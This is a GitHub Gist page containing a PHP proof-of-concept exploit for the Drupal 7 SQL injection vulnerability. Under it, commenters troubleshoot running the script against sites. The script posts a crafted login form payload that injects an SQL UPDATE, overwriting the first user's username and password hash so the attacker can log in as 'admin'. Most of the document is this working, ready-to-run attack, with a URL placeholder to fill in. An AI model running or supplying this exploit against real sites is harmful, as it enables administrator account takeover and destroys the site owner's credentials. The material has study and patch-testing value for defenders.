-
-
Save milankragujevic/61eb72df71b69df80e86 to your computer and use it in GitHub Desktop.
<?php | |
/******************************************************** | |
* Drupal 7 SQL Injection vulnerability demo | |
* Created by Milan Kragujevic (of milankragujevic.com) | |
* Read more at http://milankragujevic.com/post/66 | |
* This will change the first user's username to admin | |
* and their password to admin | |
* Change $url to the website URL | |
********************************************************/ | |
$url = '[URL HERE]'; // URL of the website (http://domain.com/) | |
$post_data = "name[0%20;update+users+set+name%3D'admin'+,+pass+%3d+'" . urlencode('$S$CTo9G7Lx2rJENglhirA8oi7v9LtLYWFrGm.F.0Jurx3aJAmSJ53g') . "'+where+uid+%3D+'1';;#%20%20]=test3&name[0]=test&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in"; | |
$params = array( | |
'http' => array( | |
'method' => 'POST', | |
'header' => "Content-Type: application/x-www-form-urlencoded\r\n", | |
'content' => $post_data | |
) | |
); | |
$ctx = stream_context_create($params); | |
$data = file_get_contents($url . '?q=node&destination=node', null, $ctx); | |
if(stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) { | |
echo "Success! Log in with username \"admin\" and password \"admin\" at {$url}user/login"; | |
} else { | |
echo "Error! Either the website isn't vulnerable, or your Internet isn't working. "; | |
} |
My $data variable comes back empty using this code, and I'm entering the url correctly using my dev server and a 7.31 site that I maintain.
@McBochi I'm working on it. I'll update the blog post if I discover something.
@jordanIgraham Please "echo $url . '?q=node&destination=node';" and open the output URL in the browser. Maybe you're simply not entering the URL correctly, or PHP is being blocked by some other means. Turn on error_reporting and display_errors. I can't reproduce the issue.
@milankragujevic thanks - omitted "http://" in my url - now much data, but the data is the html of the site at $url. The string 'mb_strlen() expects parameter 1 to be string' is not in the $data. If it's helpful, echo $ctx outputs "Resource id #2".
Not really. You should try logging in to the website... If the website has PHP display_errors turned off, you won't see the error. There is no way to verify other than to try and log in.
This approach seems quite interesting to me, but would you mind presenting a similar "less destructive" version of this exploit/test?